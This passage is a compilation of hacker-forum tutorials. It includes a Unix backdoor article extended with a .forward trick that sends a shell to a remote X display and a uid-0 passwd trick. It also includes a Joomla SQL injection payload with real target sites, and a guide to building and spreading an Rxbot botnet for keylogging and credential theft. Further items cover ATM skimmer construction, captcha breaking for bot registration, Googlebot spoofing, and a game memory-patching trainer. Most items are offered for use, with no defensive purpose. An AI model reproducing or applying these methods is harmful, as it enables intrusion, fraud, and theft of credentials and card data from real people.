systems. Once a hacker is in and has installed backdoors, trying to create

a baseline after the fact could incorporate the backdoors into the

baseline. Several companies had been hacked and had backdoors installed on

their systems for many months. Overtime, all the backups of the systems

contained the backdoors. When some of these companies found out they had

a hacker, they restored a backup in hopes of removing any backdoors. The

effort was futile since they were restoring all the files, even the

backdoored ones. The binary baseline comparison needs to be done before an

attack happens.

Intrusion detection

Intrusion detection is becoming more important as organizations are hooking

up and allowing connections to some of their machines. Most of the older

intrusion detection technology was log-based events. The latest intrusion

detection system (IDS) technology is based on real-time sniffing and

network traffic security analysis. Many of the network traffic backdoors

can now easily be detected. The latest IDS technology can take a look at

the DNS UDP packets and determine if it matches the DNS protocol requests.

If the data on the DNS port does not match the DNS protocol, an alert flag

can be signaled and the data captured for further analysis. The same

principle can be applied to the data in an ICMP packet to see if it is the

normal ping data or if it is carrying encrypted shell session.

Boot from CD-ROM.

Some administrators may want to consider booting from CD-ROM thus

eliminating the possibility of an intruder installing a backdoor on the

CD-ROM. The problem with this method is the cost and time of implementing

this solution enterprise wide.

Vigilant

Because the security field is changing so fast, with new vulnerabilities

being announced daily and intruders are constantly designing new attack and

backdoor techniques, no security technology is effective without vigilance.

Be aware that no defense is foolproof, and that there is no substitute for

diligent attention.

-------------------------------------------------------------------------

you may want to add:

.forward Backdoor

On Unix machines, placing commands into the .forward file was also

a common method of regaining access. For the account ``username''

a .forward file might be constructed as follows:

\username

|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"

permutations of this method include alteration of the systems mail

aliases file (most commonly located at /etc/aliases). Note that

this is a simple permutation, the more advanced can run a simple

script from the forward file that can take arbitrary commands via

stdin (after minor preprocessing).

PS: The above method is also useful gaining access a companies

mailhub (assuming there is a shared a home directory FS on

the client and server).

> Using smrsh can effectively negate this backdoor (although it's quite

> possibly still a problem if you allow things like elm's filter or

> procmail which can run programs themselves...).

---------------------------------------------------------------------------

you may want to add this "feature" that can act as a backdoor:

when specifying a wrong uid/gid in the /etc/password file,

most login(1) implementations will fail to detect the wrong

uid/gid and atoi(3) will set uid/gid to 0, giving superuser

privileges.

example:

rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh

on Linux boxes, this will give uid 0 to user rmartin.

hope you learned something.....

How to become the Google Bot

What you'll need:
Firefox,
The Modify Headers extension for firefox.

What you can do:
Many sites allow google to look into their forums, in order to get more traffic by getting more google search results. By pretending to be the google search indexer (aka spider, bot) we can access parts of these sites off limits to guests.

Example URL:
http://www.tuts4you.com/forum/index.php?showtopic=9959
I found this address today doing a google search, and noticed that although I didn't have access, google had a cached version. Head over to this url, and you should get the same error as me.

First, head over to google and type in 'browser headers'. The first link should take you to a page which gives you all the information your browser sends to web servers. This information, specifically the User-Agent field, is how the google bot tells web servers what it is. Go back to the google search, and click on the 'cached' link.

Notice in the 'User-Agent' field, where it once showed your browser info, now it says:
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

Download the Modify Headers extension.
(http://modifyheaders.mozdev.org/)

And open it up. Next you need to make a rule, modifying the 'User-Agent' header to say 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
Once you're done, make sure it's enabled, and browse over to the example url. Even though you're not logged in, you should be able to browse their forums.

20 Steps to Faster Smartbro

For Filipino Using Smart Bro Connection

1.) Download Cablenut http://www.softpedia.com/get/Tweak/Network-Tweak/CableNut.shtml
2.) Install CableNut, restart PC after installation.
3.) Test your speed here at testmy.net http://www.testmy.net/tools/test/d_load.php. Note your Download and Upload speeds.
4.) Note your download, upload values in Kbps & latency value in ms (milliseconds).
** To know your latency, open Command Prompt (start menu/run/type cmd/enter). In the command prompt type ping testmy.net and hit enter. Your latency is the "Approximate roundtrip times inmilli-seconds Average". However, it is just fine if you may want to getthe maximum latency value.
5.) Go to http://www.j79zlr.com/cablenutXP2k.php, don't forget to choose your connection carefully, then put your download, upload & latency values in the box provided.
6.) Click "Compute Settings"
7.) Click "CCS File Download", save the file to your desktop.
8.) Go back to http://www.j79zlr.com/cablenutXP2k.php
9.)Click TCP/IP Analyzer
10.) Know your TCP Receive Window (RWIN) values, write down the values for "scale factor of 8" and "scale factor of 4".
11.) Now, download the latest version of CCleaner http://www.ccleaner.com/download/
12.) Install CCleaner, Analyze and Run Cleaner to eliminate all unwanted and junk files in your HD.
13.) Now open Command Prompt, type ipconfig /flushdns.
14.) Exit Command Prompt.
15.) Open the CableNut setting you saved on your desktop.
16.) In the "DefaultReceiveWindow" box, change the current value to the value you wrote for "scale factor of 8"
17.) In the "DefaultSendWindow" box, change the current value to the value you wrote for "scale factor of 4"
18.)Important, see to it that the value for TCPMaxHalfOpen = 100,MaxConnectionsPer1_0Server = 10 and MaxConnectionsPerServer = 10
19.) Click "Save to Registry", OK & Exit.
20.) Restart PC

Your speed must be optimized now. Test your speed http://www.testmy.net/tools/test/d_load.php

Notes:
i. Smartbro's advertised speed is only 384 Kbps but this guide will give you almost twice that speed.
ii. This guide worked for some but might not work for others.
iii. Viruses, trojans, spywares, adwares, basestation downtime will surely affect speed tests.

Options:
i. tcp optimizer (works well with pldt mydsl): http://www.speedguide.net/downloads.php
ii. faster page loading, disable DNS caching, increase buffer: http://www.j79zlr.com/cablenutXP2k.php
iii. canopy tweaks: http://www.testmy.net/t-18616.0

Vulnerable SQL injection

SQL INJECTION IN JOOMLA
http://centrofilipino.com/index.php?option=com_jabode&task=sign&sign=taurus&id=
SQL:
-2 UNION SELECT user(),user(),user(),user(),concat(username,0x3a,p assword) FROM jos_users--

some site in google search
this bug is founded by
His0k4 [ALGERIAN HaCkEr]

http://www.mylesbianradio.com/index.php?
http://www.warwick.net/index.php

type inurl:"com_jabode"
if u found the user admin and pass/hash
crack the hash ini this site:
http://www.passcracking.com/
http://www.gdataonline.com/
the hash will cracked if the admin is not patched or accurate is 100% in donate

go Patch ur Joomla site before some script kiddie is attack ur website

CEH Ethical Hacking Videos, Tools and Slax CD version 5

How to make a botnet [full tut]

A botnet can be used to keylog computers, capture screen shots, turn on webcam and take pictures, get cdkeys, get passwords, perform DDoS attacks, run commands, open sites, basically anything really..

Here we go ladies and gentlemen.
Follow the tutorial:
-----------------------------

I. Setting up the C++ compilier: (easy)

1. Download Microsoft Visual C++ 6.0 Standard Edition

here -

http://rapidshare.com/files/125980189/msc__.rar.html

Pass: itzforblitz

Serial: 812-2224558

2. Run setup.exe and install. Remember to input serial

3. Download and install Service Pack 6

here -

http://rapidshare.com/files/125983507/Vs6sp6.rar

NOTE: Replace Mcft with Micro.soft (do not include the ".")

4. After that Download and install the Windows Platform SDK:

here - http://rapidshare.com/files/125983830/sdk.rar

Pass: itzforblitz
-------------------------------------

II. Configuring the C++ compilier (easy)

1. Open up Microsoft Visual C++ Compilier 6.0
2. Go to Tools > Options and Click the "Directories" tab
3. Now, browse to these directories and add them to the list: (Click the dotted box to add)

Code:

C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB

4. Now put them in this order: (use up and down arrows)

(it does not matter whats below those lines)
---------------------------------------

III. Configuring your bot: (easy)

1. Download and unpack: This botsource:

here - http://rapidshare.com/files/125984396/botnetsorce.rar

2. You should see an Rxbot 7.6 folder
3. Open the Rxbot 7.6 > configs.h folder and edit these lines only:

Put in quotations:
Code:

char password[] = "Bot_login_pass"; // bot password (Ex: monkey)
char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)
char serverpass[] = ""; // server password (not usually needed)
char channel[] = "#botz_channel"; // channel that the bot should join
char chanpass[] = "My_channel_pass"; // channel password

Optional:
Code:

char server2[] = ""; // backup server
char channel2[] = ""; // backup channel
char chanpass2[] = ""; //Backup channel pass

-----------------------------------
IV. Building your bot: (very easy)

1. Make sure Microsoft Visual C++ is open
2. Select "File > Open Workspace"
3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file
4. Right Click "rBot Files" and click Build:

5. rBot.exe will be in the Rxbot 7.6 > Debug folder !!!

YOUR DONE !!!! Now get the rbot and pack it (Use tool in third post and open rbot and click "Protect" and send it to some idiots, Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY !
-------------------------------------
Command list

download here -

http://rapidshare.com/files/125984564/cmands.rar

Basics:
.login botpassword will login bots
.logout will logout bots
.keylog on will turn keylogger on
.getcdkeys will retrieve cdkeys.
Read command list for more
-----------------------------------
Download mIRC

here - http://rapidshare.com/files/125984723/mirc632.rar

--------------------------------------------------------------------------------------------
How to secure your bots:

Don't be an idiot, it is easy to steal bots. All you need is the irc server address and maybe a key.
To steal bots, watch for the @login key one must upload their bot to a direct link (tdotnetwork is execellent)
and update the channel topic and run:

Code:

@update hxxp://mybot.com/download/SMSPRO.exe 82

To secure your self:

It is fairly easy to secure your bots, here is how:

1. When you are in your right click on your chat window and select "Channel Modes"
2. Make sure these options are checked:

secret and private also key (xxxx)

This way no one besides you or another op can set the channel topic Smile
Remember to make your key the same as your channel password.
------------------------------------------------------------------------
Good IRC Servers:

irc.wotnet.com is bot friendly as long as the bots do not harm the server or other users
and Zerofusion (look in mIRC) is bot friendly.

If you would like to setup a botnet on a certain server, do not intrude and make one. Talk to the admin and make sure he know that the IRC server is not doing anything illegal. If an Admin refuses, don't get angry. It is his/her server after all.
------------------------------------------------------------------------

End of tutorial

Credits : Netspliter

Hide Entire Hard Drives Partitions Without Registry

Here is a cool technique which hides entire hard disk drives by a simple procedure this is the best security tip from unauthorised users :

1. Go to Start > run > type "diskpart".
A DOS window will appear with following discription.
DISKPART>

2. Then type "list volume"

The result will look like : ------

Volume ### Ltr Label Fs Type Size Status Info
--------------- --- -------- ---- ------ ---- ------ ----
Volume 0 F CD-ROM
Volume 1 C Window_XP NTFS Partition 7000MB Healthy System
Volume 2 D Softwares NTFS Partition 8000MB Healthy
Volume 3 E Songs NTFS Partition 8000MB Healthy

3. Suppose u wanna hide drive E then type "select volume 3"

Then a message will appear in same winwods { Volume 3 is the selected volume}

4. Now type "remove letter E"
Now a message will come { Diskpart Removed the Drive letter }
sometime it requires the reboot the computer .

Diskpart will remove the letter .Windows XP is not having capabilty to identify the unkown volume.

Your Data is safe now from all unauthorised users.
To access the content of hidden Drive repeat the process mentioned above. But in 4th step replace " remove" to "assign"
It means type "assign letter E"

Breaking Captcha Images

I'll start by saying that this overview isn't for everyone. It's intended for those who have a good programming background and hopefully have worked with imaging a bit. Even if you haven't worked with images and pixel manipulation, this may be the answer to some prayers out there when people are asking themselves, "How in the world do I even start to break this thing?!?!". It is important to realize though that many times when advanced warping techniques are used it becomes almost impossible to break, all that means though is that it's -almost- impossible, not impossible

So, what's the purpose of breaking a captcha image? The reasons may vary, but most of the time it's to be able to use a bot to automate some process (what captcha images are meant to prevent). For example, say in HTS, Real 1 there was a way to register at "Uncle Arnold's Local Band Review" that used a captcha image. Well we know by the challenge that we have to get the band "Raging Inferno" up to the top. In a real world situation that didn't have the same type of security flaws as the Real 1 challenge, we could register hundreds of bots that simply vote the band up to the top, and to do this we'd have to break the captcha image at registration.

Remember though, Captcha images are never universal, every different site has their own specialized captcha, so there's no simple "global" fix for all of them. With that said, however, it's easy to take code once you've written it and transfer it into another captcha breaking project.

This overview is meant to establish the groundwork so that you can break captcha images easier in the future. You can use virtually any language, however, I recommend C/C++ or C# just for speed reasons. One of these examples I've done in PHP and it works quite well, though it goes slower than most.

Now lets begin our overview of captcha breaking!

[Step 1: Analyze and Prepare]

This is more of a step that you would take after you have read this entire overview, however, I'll fill you in on it now. When starting to break a captcha, look it over, refresh it several times, and find all aspects of the captcha. Does it use different fonts? Does the background change? Is there a background image? Does the text change from bold to italics? Does the text move around on the image? Is the text a completely different color than the image? What characters/charset does it use? Is it case sensitive? These questions and more are all things you must ask yourself and analyze while looking at the different variations of the captcha image.

Now that we've got a good idea of what's what, we need to be able to start the breaking process. This just depends on what language you want to use, but make sure you have a way to open the image into your language and read all the bits into an array. Whether you do this by looping through all the pixels and putting them into an RGB array, or by using some function like LockBits or GetDIBits. This part is essential to being able to work with the image. Never try to manipulate the image using single pixel functions, like functions that get or set the color of an individual pixel. These functions usually take an extreme amount of time to perform simple tasks. The only time you'd ever use those functions is when you're reading the pixels into an array. Okay, now that you've got the general idea, on to Step 2!

[Step 2: Get rid of the crap!]

A lot of people who write captcha images like to think that they are very crafty and cunning with the garbage they put in to throw you off. Here's a big morale booster... 99% of the time it's just that, crap. You can easily write image filters to go through and wipe out the junk.

Looking for ways to get rid of garbage often times includes looking for patterns in the image. You have to really think hard about what you can and cannot use against them. For example, you come across a captcha image that has black text, but unfortunately it has an image in the background. How do we filter out the text from the image? Simple, write a filter to include only back and colors close to it (when saving in JPG, not all colors will be perfect so you have to account for some variation in color). By filtering out all pixels that aren't close to black, we're left with just the text. One way of thinking is to ask yourself, "How is it possible that I can read this? How come I can distinguish the text from the garbage and noise?". A lot of times these questions will bring you to the answer. Lets look at some examples.

Now, start by asking yourself what you notice in this image. Is it the dark text that jumps out at you? How about the light background? Both of those we can use to our advantage. Now what about those lines? For now, we'll deal with those after we get rid of the background. So we think we have an idea of how to break it... but what happens if they throw something like this at us?

The text is barely visible! Not to mention the amount of noise is cluttering up the screen. Lets think about this, how is it possible that we can read this? Simple, the text is still slightly darker than the background. So, for our filter we'll write it to turn all pixels that are darker than a certain amount to black, and all pixels that are lighter than that certain amount to white. I find that when working with captcha images, it's really nice to be able to convert them to monochrome for working with, since monochrome is just black and white. You can then use a simple 2 dimensional array for the width and height, and just use 0 and 1 for black and white. Here's our result:

Wow, now the text sure stands out! But what about that annoying background noise? Notice how it looks like there are very distinct lines going horizontally. If you look at both the original images very closely, you'll notice they aren't lines, but rows of dots! Getting rid of this is simple, all we have to do is scan the image for a pixel that's white, then a pixel that's black, then another pixel that's white again. By scanning the image for that pattern, we will be able to find and isolate the dots. Since if we look at it, it's actually both columns and rows of dots, we'll do a 2 way filter. One that looks for dots going up and down, and the other left and right. Pseudo code for left-right would look like this:

if (Pixel[x,y] == 0 && Pixel[x + 1] == 1 && Pixel[x + 2, y] == 0)
Then we have a dot in the middle! We could also do another if that flips the black with the white to scan for white dots, but we don't need to now. The same can be done for scanning up and down, just by adding 1 and 2 to the y instead of the x. The last part of our code here is to set the middle dot to white. Here's what we've got now:

Much better, we've eliminated the majority of the background and some parts of those random black lines. A big hint here now on what to do is that you can actually use the same and or close to the same filter that we just wrote above to remove these black lines. If we write something that looks for individual pixels that are not touching more than 3 other black pixels (there are 9 pixels around any single pixel that is not on the border of the image), then we can eliminate almost all of the noise.

Now that's looking really good. Unfortunately here this is the point where the above filter probably ends, since if we go any further and, lets say, try to eliminate pixels that aren't touching more than 5 or 6 black pixels, we'll start eating away too much of the text. Keeping the text close to it's original look is key for cracking captcha images. What we're going to do now is a method that I've come up with which uses Flood-Filling to eliminate random garbage. If you're going to top performance, you can always write your own FloodFill function, or you can find GD libraries that include FloodFill functions. PHP for example has the function "imagefilltoborder" which is exactly what I want. I also decided to write a performance version of this same application in C#, which I wrote my own FloodFill function. So you might ask, how are we going to use FloodFill to eliminate garbage? If we look at the image we have now, we notice that all the garbage is in really small parts, while the text is very thick and large. This gives us an advantage to breaking it, because we can simply go through every black pixel, run a FloodFill on it, count the amount of pixels that got filled, then if it's less than a certain amount... throw it out. The smaller pieces of garbage will only have a pixel count of usually 20 pixels or less, so we write our function to get rid of anything that fits our needs. You may or may not even need this step, however, if you do use it the pixel count will have to be adjusted based off of your image and how much garbage you have. After we run this new filter, our image looks like this:

Alright! Now just to let you know, depending on the captcha, not all the junk needs to be filtered out. This will also depend on the method you choose in Step 3.

[Step 3: Define our letters]

The third step is usually easier than the second. Whereas before we were just cleaning the image up, now we're going to actually define where our letters are on the image. Lucky for us, the letters are still there and pretty thick, so how should we do this? Here are our options:

Method 1: Break the letters into individual cells

Implementing dynamic crypting salts

The MD5 hash of a string will always be the same. That is one of the largest weaknesses of MD5. So we know that if we hash a users password and store it in the database that we can compare the hashed password in the database to the password they supplied and we hashed for comparison.

So let's say Mr. Cracker gets a hold of the user:Pass list for everyone in the database. Well he can in theory crack the hashes of the passwords using rainbow tables. Now I won't go too into detail about rainbow tables, but just think of it as a huge table of words and their MD5 hashes together. What they do is scan through the tables looking for a match. Similar to the way we compare the hashes for logging a user in, only they have the plain text version too.

Now if we decided we wanted to hash the password "lolwut" using the MD5 algorithm we would go:

md5("lolwut");

Now the MD5 hash of "lolwut" is "05a208028929fd77cfb5b08096a837df" and it always will be. Now all a "salt" is, is just a string appended to the password before it gets hashed. So say we use the salt "25tks8j3s5" for every password for every user that registers. We achieve that by doing something similar to this:

md5("lolwut"."25tks8j3s5");

That will result in the new hash for our user becoming "229ade86bcc789ed3239bc533f16f7b3". This is obviously different from our regular non-salted hash of "05a208028929fd77cfb5b08096a837df".

This alone is fairly good because it breaks the standard rainbow table. Mr. Cracker would have to make a custom rainbow table with our salt at the beginning for each word in his table to try to crack the userass list.

If we decided to stop here (which some do) that would be, ok. But why? Let's make it even harder for Mr. Cracker. If we could have a a random salt for each individual user then it would be near impossible to crack all the passwords. Why? Mr. Cracker over here would have to spend the time to make a new rainbow table for every password he wanted to crack because each of the salts would be different. (I'm assuming here that anyone who has your user:Pass list is also clever enough to retrieve all the salts for each user. This is also assuming that your storing the salts for each user inside the database next to their password or wherever it gets placed). Here is a function I wrote (with some generous help from Google) to generate a random salt.

//generates a random salt for use when crypting user passwords

//includes all upper and lower case, numbers, and common symbols (no ALT code symbols)

function gen_salt($length)

{

$salt = "";

$possible = "abcdefghjklmnpqrstuvwxyzABCDEFGHJKLMNOPQRSTUVWXYZ 0123456789!@#$%^&*()_-+=[]{}\/.,?<>`~";

$i = 0;

while($i < $length)

{

$char = substr($possible, mt_rand(0, strlen($possible) - 1), 1);

$salt .= $char;

$i++;

}

return $salt;

}

Using the function above we can generate a fairly random salt for a user. Like so:

$salt = gen_salt(5);

$pass = "lolwut";

md5($pass.$salt);

Then of course you would store the salt that was generated and the hash of the salted password inside the database for the user. Now that the salt and the hash of the salted password are in the database, say a user wanted to login. We grab his username, query the database for it, find the row with his username which will contain his salt and password hash. Then we can append the salt to the password the user provided when trying to login, hash it, then compare that to the hash of the salted password inside the database.

The length of the salt doesn't necessarily have to be uber long either. Anything above 5 char's should be ok.

And that's all I have to say about that...

Modular Password Rotation

Modular Password Rotation (MPR) is a method of making nearly unbreakable passwords for things where the password can be easily changed, instantaneously. Examples of applications for this would be things such as accounts on forums, email, etc. bad examples of things like this are PGP passphrases, etc.

MPR greatly protects against guessing of passwords, as well as brute forcing. Of course, nothing can protect you from your own ****ed up'dness, so if you're retarded, this won't help you all that much. keyloggers will still get you.

To begin using MPR, make a number of unique passwords. I would recommend all of these be mixes of characters, although some can be words. At least one should be random. For example, let's use 'ka846ds', 'jfk9865s', and '75jd93w'.

Next, arrange these in an order to your liking. This would produce a password such as 'ka846dsjfk9865s75jd93w'. The crucial part to MPR is remembering not the entire password, but each of the components, or modules.

Now, after a determined amount of time, say, tri-daily (every three days), simply rotate the modules to create (in a brute forcer's mind) an entirely new password, such as 'jfk9865ska846ds75jd93w'. However, to your mind, this is the same password. With three modules, there is nine possible combinations. As you get comfortable with three modules, it is easy to add a fourth, and potentially even more, modules. This increases password security exponentially.

In conclusion, MPR is an intensely difficult password scheme to crack. it provides immense security, ease of use, rememberabilitity, and makes you feel cool for having such a great password. Have a great day, and don't get eliminated.

The concept of Modular Password Security (MPR) and article (c) b3cky, 2008.

How to Make an ATM Skimmer

I take no responsibility for these instructions. They were given to me from a friend.

I DID NOT WRITE THEM, AND I DON'T TAKE CREDIT FOR THEM.

These instructions are very good. I even have an extra Allumilite Kit for sale if anybody has trouble finding them.

Granted you're results will be nowhere near as fantastic as Dron's product.

It still proves it's possible tomake something from almost nothing.

::::::::::::::::::::::::::

You will need a
dremel

msr 500m

http://www.msrfactory.com/msr500mwebsite.htm

Aluminite Starter Kit

http://www.alumilite.com/checkout/product_info.php?cPath=26&products_id=49

pcmetal putty

http://www.pcepoxy.com/puttyepoxies/pcmetal.asp

Fine grade sandpaper

Spraypaint

Depending on the type of skimmer you may need minor additional products to replica the unit.

First thing you would need is to indentify the type of skimmer you want to make.

Perferable choose one that is common in your area.

Once you had the type you need to obtain a copy of the original reader that your skimmer will be covering.

There are two ways to do this. You can either buy it as a replacement part online or make a copy.

To make a copy, open your aluminite starter kit and you will find clay bars.
Combine the bars into one.

Go the atm and firmly press the clay onto reader.
Pull it off gentley and you should have a impression of the reader.
Take it home and use the resin mixture from your starter kit
to make a copy of the atms reader.
It dries hard in under 3 minutes.
You should now have at this point a replica of your targets reader.
You may want to lightly spray wd40 before appling the clay to insure
that you dont leave clay residue.
Just be sure to wipe it clean after.
Its best to do this very late at night to ensure no prying eyes.

Now that you have the replica of the reader.
Disasemble the msr500 completely out of its housing.
You will see that it is very simplistic in design.
The key part to making a skimmer is the position of the reader.
It must be in the correct position to read the cards properly.
So depending on the design dremel the head enclosure to as small as possible.

The metal brackets holding it in, is to ensure the reader has movement
to allow the card axcess to proceed past the head.
the smaller the better.

Use the pcmetal putty to accomidate for the nessesary dremeled brackets.

Once your at this stage, You need to design your skimmer .

Place your msr500 parts where it best fits ontop of the replica reader.
It good to place it in such a way that you can have access to turn it on and off.
I use a toothpick to ensure a channel to the on off switch.
Apply one layer of suran wrap over your replica reader and msr parts,
this is to ensure the clay does not stick to it.
Start placing the clay from your starter kit ontop of the suran wrap
in such a way to minic the design of the orginal reader enclosure.
The readers are very basic and clay is very pliable,
so it should be rather easy to replicate a design.
make sure that everything is flat and smooth.
I use cards to ensure smooth lines and flat surfaces.
once you are happy with your design, gently lift off the clay.
You should have at this point a clay representation of your skimmer.
Use your starter kit and follow the directions on how to make mold.
From the mold make a resin unit.
Place your msr500 parts into the unit the same way you had them layed out
ontop of the original reader.
Use the pcmetal putty as needed to secure the parts
into the unit.
Next, sandpaper the rough edges and spray paint the unit the color to match the atm.
Your ready to test at this stage. Once you have sucessfully tested to ensure your skimmer lines up perfectly with the atm your ready to go . Use the pcmetal to create a good bond with the atm. it makes it hard to get off. Even if you break it, taking it off. You still have the molds to make another.

CZ writer

Destroy DMA - NOP

Mouses Tutorial on Defeating DMA in your favorite Video Game(im using q2)

i have looked all over the internet and searched...and earched and searched and i couldnt find a tutorial that shows howto write C/C++ code for the trainer
so i said **** it ill write my own

OK your going to need 3 things for this tutorial

1.Tsearch -autohack is pwn
2.q2(t3h game torrents is your best bet if you dont have it)..i might upload...maybe!
3.a C/C++ Compiler i perfer code::blocks and so does pheron but you can use Bloodshed DevC++ if you want

NOTE: i just relised im putting 2 tutorials together finding addresses w/o DMA and with DMA..so be happy(go MOUSE w00t.okay enough)

ok first off decide what kinda hack you wanna do(i suggest nothing server side)
i decided todo Health..because its simple

ok so first off we start with the basics :)

run your game in windowed mode...if possible -window is a common switch among most fs games

now run T-search click OpenPRoccess search for your Game EXectuable name (quake2.exe for me)

alright now your value of w/e your trying to hack is shown onscreen(i hope) click the first magnifying glass above Address and enter that value

alight in game depending on what your trying to hack do something ..i picked up health your ingame value should change
now go back to t-search(using alt-tab) click on the magnifing glass with the elipsis under them(...) now on the combobox click "value has changed"
and enter the new value

what this does is compares the values that have changed and if they have then list them..repeat this process untill you have around 2-6
(for mine quake2 gave around 30 results i just selected them all and froze 5 at a time untill i had a group that did frezze my value and just did process of
elimination :)

FREZZING:

now its time to see what adress holds our magic value
double click the values in the find window to move them to the freeze window
how go one by one(hopefully you dont have more then 30 lol) and change the value and "freeze the address" by clicking the little checkbox on left side
..normally thats it...thats all you have todo...but folks...this is DMA(Dynamic Memmory Allocation)
meaning that address..if you restart the game will not be the same so we must dig into ASM code and find the culprate

AUTOHACK..is pwn:

alright so now we know somewhat where our memmory address is lets find the source of this bastard

for this you need to click Autohack>Enable Debugger then AutoHack>AutoHack window NOW
click edit>Set Breakpoint remember that awesome adderss we found earlier...i hope you wrote it down or spawned a notepad.exe/wordpad.exe

put that address into the Set Breakpoint Window and click Read/Write and hit set mine was 1BA058C..your will deffintly be diffrent..or who knows
could be the same..remember if it then thats just ironic..its not always gonna be that

so now go back into the same and do whatever it is that triggers the targeted goal(im getting shot by baddies lowers my health)
NOTE:unfreeze the address else changes wont really seem real

now you should see a bunch of scrammbled or messy wierd code...this is asm :)

ADDRESS: instruction[]

example 20028548,[eax+0x1E0]

basicly in the code at address 20028548 ....is this instruction

now what you wanna do is Nop(NULL or make nothing) the correct one...be carful tho i once froze two address at the same time and died by tocuhing water lol
so

freeze one by one untill you get the right one...you will know its right because you wont lose health or die or w/e

NOW
we have found the instruction....****ing bastard lets write a program that always NOPS(nulls) the code so we can LIVE FOREVER BWAHAHAHAHAHA..kk im done

the next thing is to click Tmk>Button Script
mine looks like this(just paste it into notepad)

Tmk button script
Copy and Past into tmk using ctrl+V
Ex: Patched script for a ON button
and Unpatched script for a OFF button

Patched script:
Poke 2000513F 90 90 90 90 90 90

UnPatched script:
Poke 2000513F 89 8E E0 01 00 00

fire up your favorite C/C++ Compiler and lets code us a hack :)

im going to show you the code i used for my hack it works great and im so proud of it...maybe using one of my gui tutorials you can code a nice GUI
for it :)

#include <windows.h>
#include <iostream>
#include <sstream>

void EnableDebugPriv();

using namespace std;
int main()
{
LONG address = 0x2000513F;
//here you put the address of the autohacked address that worked :)

EnableDebugPriv();
//a simple function

HWND q2 = FindWindow("Quake 2",NULL);
//the Title of the Window
if (!q2) //is the program running?
{
cout << "Quake 2 window NOT found\n";
return false;
}
DWORD pid;
GetWindowThreadProcessId(q2, &pid); //get the procees ID
HANDLE hopen = OpenProcess(PROCESS_ALL_ACCESS, false, pid); //open the process for read/write
if (!hopen)
{
cout << "PID ERROR\n";
return false;
}

BYTE data[] = {0x90,0x90,0x90,0x90,0x90,0x90}; //this is out code from the TMK script remember
//Patched script:
//Poke 2000513F 90 90 90 90 90 90 just add a 0x infront of the numbers
while(1) //this is a bad way to keep writing to the program it loops forever...adn ever untill you close the program
{
bool success = WriteProcessMemory(hopen,(LPVOID)address, &data,6, NULL); //be sure you change the number to however many your tmk code gave you

if(success) {
cout << "Hack Loaded\n";
} else {
cout << "Hack Failed\n";
}
}

CloseHandle(hopen);

//function from msdn ;)
//this allows us to open the process with debug write aka read/write memmory without windows *****ing

void EnableDebugPriv()

{

HANDLE hToken;

LUID sedebugnameValue;

TOKEN_PRIVILEGES tkp;

OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);

LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue);

tkp.PrivilegeCount = 1;

tkp.Privileges[0].Luid = sedebugnameValue;